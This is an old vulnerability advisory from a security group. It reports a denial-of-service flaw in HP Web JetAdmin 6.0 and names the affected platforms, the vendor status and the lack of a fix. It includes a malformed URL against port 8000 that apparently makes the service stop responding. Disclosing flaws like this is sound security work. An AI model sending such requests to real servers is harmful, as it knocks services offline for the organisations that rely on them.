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USSR Advisory Code: USSR-2000042
Release Date:
May 24, 2000
Affected Software Versions
HP Web JetAdmin Version 6.0 (Microsoft Windows 2000)
HP Web JetAdmin Version 6.0 (Microsoft Windows NT 4.0)
HP Web JetAdmin Version 6.0 (HP-UX 10.20) (not tested)
HP Web JetAdmin Version 6.0 (HP-UX 11.x) (not tested)
HP Web JetAdmin Version 6.0 (Linux - SuSE) (not tested)
HP Web JetAdmin Version 6.0 (Novell NetWare) (not tested)
HP Web JetAdmin Version 6.0 (Red Hat Linux) (not tested)
HP Web JetAdmin Version 6.0 (Solaris) (not tested)
THE PROBLEM
UssrLabs found a memory null heap Vulnerability in HP Web JetAdmin Version 6.0 (port 8000) default.
What happens is by preforming an attack with a malformed url information to port 8000 it will cause the
proccess containg the services to stop responding.
Example:
Original:
http://SeverIp:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$
__hpjwja_ack_ini)(_deviceList)&clearFilters=true&_refreshdevicelist=true&_special=new
Malformed:
http://ServerIp:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$
SPECIAL NOTE: That we take no responsibility for this, is for educational purposes only.
Vendor Status:
Informed.
Vendor Url: http://www.hp.com/
Program Url: http://www.hp.com/cposupport/prodhome/hpwebjetad1880.html
Fix:
Noting Yet
Related Links:
Underground Security Systems Research
http://www.ussrback.com
Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN, Sub, prizm, b0f,Technotronic and Rfp.
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